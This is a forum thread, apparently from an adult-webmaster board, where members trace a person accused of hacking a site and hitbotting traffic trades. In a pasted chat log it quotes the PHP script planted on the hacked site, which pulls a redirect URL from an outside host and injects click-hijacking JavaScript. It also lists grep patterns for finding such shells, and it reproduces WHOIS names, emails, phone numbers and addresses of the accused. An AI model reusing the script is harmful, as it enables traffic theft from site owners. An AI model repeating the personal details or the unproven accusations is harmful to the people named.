100 :thumbsup

Just read this one from start to end... Great sleuthing, and I hope this guy gets caught and punished severely.

With everyone working together, hopefully this thief will pay a big price.

:)

its been 2 days now paxton and he is not stoped yet;(

It also sounds like he is using a cron to reset the shit everytime you fix it.

grep your web directories for,
passthru
system
PASSTHRU
exec

talking to the tech now

no weird cron jobs

tekkies made a lot of tweaks on the server
let's see how it goes

and still all sponsors that have been listed here please ban the fucker

And another bump.

Thanks man:)

man i hope you get this fucktard

his newest hit bot url.. just hit one of my sites as a trade a little while ago..

freesexforall.net

god damn how many sites does he have hmm

What are you doing dude? thats not right. :mad:

what do you mean?

I'm starting to think it's the same guy that was doing this to tgps about 1-2 years ago with the submissions - he had hundreds upon hundreds of galleries and redirects. I trying to find my germesia reports to remember his username and the urls he used. At the time, I believe it was .net & .org he was using.

Bump... I hope you catch him! I'm sick of these fuckers hitbotting with a new domain every other day.

I don't know if this is the same guy or not, but he was hitting one of my TGPs a lot the last month.. with a new domain hitbotting me every day, then redirecting to some domain like u-232.com or something like that. The domains were:

livexdol.com
newfreeworld.com
annandcindy.com
50only-girls.com
1000freelove.com
15xxxtenn.com
1bignumber.com
besthottop.com
xteyn.com
supernaturallove.com
x4real-baby.com
jikypix.com

The most common WHOIS data (it's the same on 7 of them):
Registrant:
GPS
all fisher ([email protected])
kolomiag str 15 k51
Saint-peterburg
RU,195290
RU
Tel. +881.5464666

Creation Date: 23-Aug-2004
Expiration Date: 23-Aug-2005

Domain servers in listed order:
ns0.hqhost.net
ns1.hqhost.net

Dunno if this is the same guy.

Add sex-bunnies.com to the cheater's domains. Found the same refcodes on it for several of the programs crockett mentioned in an earlier post, in addition to the extron refcode. Also the xbang refcode is the same as on empgs.com.

Thanks damagex ;)

thanx damage ...
i've been sending you some info 1month before...

that trades seemed to be so strange


...

You were right, obviously. I just couldn't prove anything at that point. :(

marec did he fuck your site up to?

BUMP for AFF to remove this scum , They are paying for this punk to hack servers. ( not directly )

Double that and a side of tabasco sauce..

I'm all for hitting cheaters where it hurts, but do you guys honestly think that sponsors will term an account for hitbotting or cracking? They'll most likely just refer you to law enforcement...

I think an honest program definately will kill the account. Otherwise, yeah... get a lawyer they'll say.

Yes they will. They are stealing traffic from other affiliates so AFF isnt making any more money by letting them sell them stolen traffic.

Especially if you did go to law enforcement , it would say the sponsor knowingly accepted the proceeds of crime.

It would be like a pawnbroker buying stolen tv sets.

If you went in and said " hey thats my tv some guy stole it" they would remove the tv and contact the police themselves. If they sold it after they were notified it was stolen , they would be charged.

you are so right smokey

You mean they are not bright enough to write complex code?

i am sure thats not what he meant lol

hope u find this guy, good job everyone who dug up info

i hope so to thanks

He probably means that they're not desperate enough to do it. The poorer the country the webmaster's from, the higher the odds that he'll go to great lengths to cheat you. 99% of the cheaters I catch are either Russian or Ukrainian, with an occasional presence of a Belarussian, Baltic or some other Eastern European webmasters. Can you blame a guy for starting to shoot first and asking second, when this happens daily?

great thread. Removing this prick from my trades now.

This guy is the biggest cheater on the planet. I have thousands of his IPs banned (no exaggeration). He regularly attempts to submit cheating galleries, cheating trades, and attempts various internet shenanigans. I know for a fact he websites in at least a dozen different hosting facilities. I get ICQs from a dozen different accounts trying to get partner accounts. The vastness of his empire is mind boggling. I assembled a quick list of stuff I have confirmed as belonging to the same person:

Affiliate IDs:
-------------------------------
http://adultfriendfinder.com/go/p35541.subYell


Domain names:
--------------------------------
700k.com - 66.28.176.79
empgs.com - 66.230.167.225
galsteam.com - 216.195.37.10 - on ban list
yellow500.com - 216.195.36.55 (EVERY FUCKING GALLERY ON THIS PAGE CHEATS, BAN ALL!)
searchv.com - 195.225.176.27
sesupport.com - 66.230.164.248
alexlesnoi.biz - 209.66.115.80 - on ban list
a-137.com - 195.225.177.27 - on ban list
runsearch.com


DNS:
--------------------------------------------
NS1.YELLOW500.COM 81.3.164.1
NS2.YELLOW500.COM 217.146.192.22


Registrar Names:
--------------------------------------------------
Domain Name: V61.COM - 209.66.122.49 - on ban list
Registrant:
None
Pavel Petroff email: [email protected]
PO BOX 2176
c/o Pint spb N20
Slough PDO,SL3 0PE GB
Tel. +7.5017000206

Domain Name: YELLOW500.COM
Administrative Contact:
WM, Paul [email protected]
295 Greenwich str. #353, Spb/P
New York, NY 10007
US
+1.2129645528

Registrant: sesupport.com
Pojan Rousov +420.2248362563
Pojan Rousov
53 Smetanovo
Praha 1,Prague,CZ 88327

Domain Name: SEARCHV.COM
Registrant:
none
Hassan Pennock ()
Becker Street 67 68
MINNEAPOLIS
MN,55450
US
Tel. +1.6122224454

This is merely the tip of the iceberg. I have hundreds more of this guys class-C IP blocks banned. A sample of my ban list (any IP starting with):
209.66.114.
209.66.115.
209.66.116.
209.66.117.
209.66.118.
209.66.119.
209.66.120.
209.66.121.
209.66.122.
209.66.123.
209.66.124.
216.195.33.
216.195.36.
216.195.37.
216.195.38.
216.195.39.
216.195.40.
216.195.41.
216.195.42.
216.195.43.
216.195.44.


:(

Thanks for the ip list

This one deserves to be bumped.

:warning

They were talking about this guy and this yellow500.com domain in October '03.

http://www.gfy.com/showthread.php?t=...=yellow500.com

:(

Man that sucks. I hate that shit.

I hade a very nice talk with the retard Paul from http://www.gals-post.com
wich runs most of the sites on here and he told me he is from the Czech
and was been away for a party the last 3 days so he dont know anything about all this
Erik (08:30 AM) :
you should read this
http://www.gofuckyourself.com/showthread.php?t=440874

Paul (08:31 AM) :
Oh yes i already see this

Erik (08:32 AM) :
and what do you think about that?

Paul (08:35 AM) :
I dont see any my domain

Erik (08:36 AM) :
are those not yours?
<http://www.fanclips.com/> whois info <http://www.whois.sc/fanclips.com>cams.com aff ID "extron" confirmed on this one 8)
<http://www.antmovies.com/> whois info <http://www.whois.sc/antmovies.com>
<http://www.thehard.net/> whois info <http://www.whois.sc/thehard.net>
<http://www.galsteam.com/> whois info <http://www.whois.sc/galsteam.com>
<http://www.oldmummy.com/> whois info <http://www.whois.sc/oldmummy.com>

Paul (08:43 AM) :
But bro i have 3 day of party in later and now i see that
I think some guys use my ID for cheat :(((
I very afraid
Please give me some time and i check all this

Paul (08:45 AM) :
Oh man i really not cheater
Can you help me in find right way ?

Erik (08:50 AM) :
so you dont think its strange that the sponsor codes used on the http://www.tracktraff.cc/cnt/processor?reddevil have the same codes as on all your sites?
Erik (08:50 AM) :
which means that its you my man
Paul (08:51 AM) :
What are you doing if some guys use your codes ?
Erik (08:51 AM) :
lol so you think that somebody stole your codes to make you more money?
Paul (08:52 AM) :
Now i dont know but if you say me that then its one of way
Erik (08:53 AM) :
why the fuck whould anybody steal your reff codes and make you money
Paul (08:55 AM) :
Please give me some time and i say to you what happened
Erik (08:55 AM) :
sure take all the time you need so you can run and hide man i would do the same if i was you


suprise suprise he dident do it he sade lol
i sent him the link
http://www.tracktraff.cc/cnt/processor?reddevil dont click
to see what he thougt about it, his response was that the url was blank , i tried it and sure as hell it was not blank

Bump for good cause.......
 

Hackers should really put their knowledge to better use. Kudos to all the GFY's to pull together and find this guy and take neccesary actions. :winkwink:

If your site is still jacked, i'll help ya if you icq me

thanks 4pics but sisnce the tech monitered the server and site 24/7 now and made alot of changes nothing has happened agian

and i hope it stays like that to

Titan, great input, thanks!

here is a nother funny log somebody sent to me

Switch (03:23 PM) :
Switch (03:13 AM) :
Is galsteam you>> great then you gong to be the next issue on the boards
Switch (02:07 PM) :
An dthi ssi just the beginning, do you think you can hide, lol we have you already, you can not even walk peacefull on the streets anymore
Paul (08:20 AM) :
Hi
Switch (08:29 AM) :
Hi
Switch (08:37 AM) :
How do you feel.
Switch (03:14 PM) :
HI ass
Paul (03:14 PM) :
What are you say ?
Switch (03:15 PM) :
Hi ass, you must be realy be bad treated in teh past.
Paul (03:19 PM) :
Ok bro if i ass then you are fucking man
I dont use any hitbot and i never hack any site
Owner of dafreexxxmovies is make big mistake and hi already know it
Switch (03:20 PM) :
I odnt make misstake and I show you
Paul (03:20 PM) :
Please say me what i doing wrong ?
Switch (03:21 PM) :
This is the script thats has been plavced on raw-co.com

<?
$url = join('', file("http://rdposters.com/ads/ban.php?ip=$_SERVER[REMOTE_ADDR]"));
$url = strstr($url, "<a href=");
if($url) sscanf($url, "<a href=\"%[^\"]", $url);

$script .= "<script>\n";
$script .= "clicks = 0;\n";
$script .= "function doclick(a) {\n";
$script .= " clicks++;\n";
$script .= " if(clicks hahahaha 2) a.href='$url';\n";
$script .= "}\n";
$script .= "</script>\n";

$html = join('', file("http://raw-co.com/index.html"));
if(!$url) $output = $html;
else {
$output = str_replace('<a href=/ct/cx.php?i=', '<a onclick="doclick(this)" href=/ct/cx.php?i=', $html);
$output = $script.$output;
}

echo $output;
?>
Switch (03:22 PM) :
http://rdposters.com/ads/ban.php goes to http://www.tracktraff.cc/cnt/processor?reddevil
Switch (03:22 PM) :
Whois on tracjtraff.cc http://www.enic.cc/en-def-4b1ef4a948...XlwA&mS=l3dwSg
Switch (03:23 PM) :
Email adress on that domain yellow500.com
Switch (03:23 PM) :
WHois on http://www.whois.sc/yellow500.com
Paul (03:23 PM) :
Wait
Paul (03:23 PM) :
Stop
Switch (03:23 PM) :
Paul galsteam.com Fuckut you ar ebusted

A bump just for a sake of it. Great thread and a lot of tho think about!
Good work guys!

so now he claims i know that its not him
as he wrote
Owner of dafreexxxmovies is make big mistake and hi already know it


BULLSHIT fuck you retard
so he removed his email from yellow500
and then send me a mess where it says

Paul (03:35 PM) :
Ok bro yellow500 its not my domain

Paul (12:47 PM) :
I only want notify you
About three months ago some guys hack my FTP account and setup exploit at my page
And
He stay at my server FTP client

If some guys hack your site then check all your file. in one of files forexample *.php some guys can have FTP client


and now
Paul (03:37 PM) :
This guys is use my date for abuse send to me but not for him
Paul (03:38 PM) :
Are you have some free traffic for me
Now i dont have a channel for feeding my site
Paul (03:39 PM) :
May be you sell for me some
Paul (03:39 PM) :
If this guys is cheater then i dont want buy traffic from him
god damn

omg now he is having fun the url he placed on our site
http://www.tracktraff.cc/cnt/processor?reddevil
goes now to
http://************/jDC1O11L16903Nsz8VEr1Z0psSaN70a3

and now its 404 http://www.tracktraff.cc/cnt/processor?reddevil

I hope this guy can be shut down.